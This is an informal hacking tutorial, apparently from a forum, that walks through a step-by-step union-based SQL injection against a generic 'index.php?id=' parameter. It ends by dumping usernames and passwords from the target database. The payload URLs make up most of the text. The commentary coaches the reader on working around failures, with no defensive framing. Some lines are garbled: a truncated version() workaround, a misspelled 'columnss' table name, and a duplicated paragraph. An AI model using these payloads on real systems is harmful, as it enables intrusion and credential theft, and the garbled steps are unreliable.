1- site.com/index.php?id=1'
2- site.com/index.php?id=1 order by 10--
3- site.com/index.php?id=-1 union select 1,version(),3,4,5,6,7,8,9,10--
4- site.com/index.php?id=-1 union select 1,2,3,4,group_concat(schema_name),6,7,8,9,10 from information_schema.schemata--
5- site.com/index.php?id=-1 union select 1,2,3,4,group_concat(table_name),6,7,8,9,10 from information_schema.tables where table_schema=0x(hexed database)--
6- site.com/index.php?id=-1 union select 1,2,3,4,group_concat(column_name),6,7,8,9,10 from information_schema.columnss where table_schema=0x(hexed database) and table_name=0x(hexed table name)--
7- site.com/index.php?id=-1 union select 1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10 from "database"."table"--
Explanation:
3- In this step we are using version() to get the version of the Databases we're going to attack, instead of @@version you can use:
@@version or unhex(he
@@version))
or (@@version using latin1) and there's many others but these are the
ones that I mostly used when the normal @@version doesn't work... I
won't explain why I use these now because if I want to I will have to go
threw some real shit and how databases works etc...4- There we are retrieving all the Databases names that can be found. I am sure I said that before but anyways, NEVER USE database() because this will only display the main database which is completely useless using what has been written in 4 will display all of the databases at once.
5- In that step we are getting the Table Names from a specified database, this is why we added: from table_schema=x(hexofthedatabase) because we wanna retrieve the table names from that database we specified
6- In this step, we're doing the same thing, we're getting the columns, the only different is that we also added table_name to specify from which table name we wanna get the columns. Now I have to say something that people doesn't really care about and it's when people wanna retrieve the columns from a specified table name but without using table_schema, wtf, if you don't want to specify which database you may face some real shit:
- If there's two tales that has the same names but are in different database you will be facing some real shit because the query you used is shit
- Simply, this sometimes doesn't work
So stick to what is written in step 6, it always works, if we give the right info and details we will get the right info and we details we are looking for
7- In that step we are retrieving the data inside the columns, this is simply, just make sure you use from databasename.tablename because if you don't you will be facing the same shits you will face if you only mention which table without mentioning which database:
- If there's two tales that has the same names but are in different database you will be facing some real shit because the query you used is shit
- Simply, this sometimes doesn't work
So stick to what is written in step 6, it always works, if we give the right info and details we will get the right info and we details we are looking for
I'm: Kiss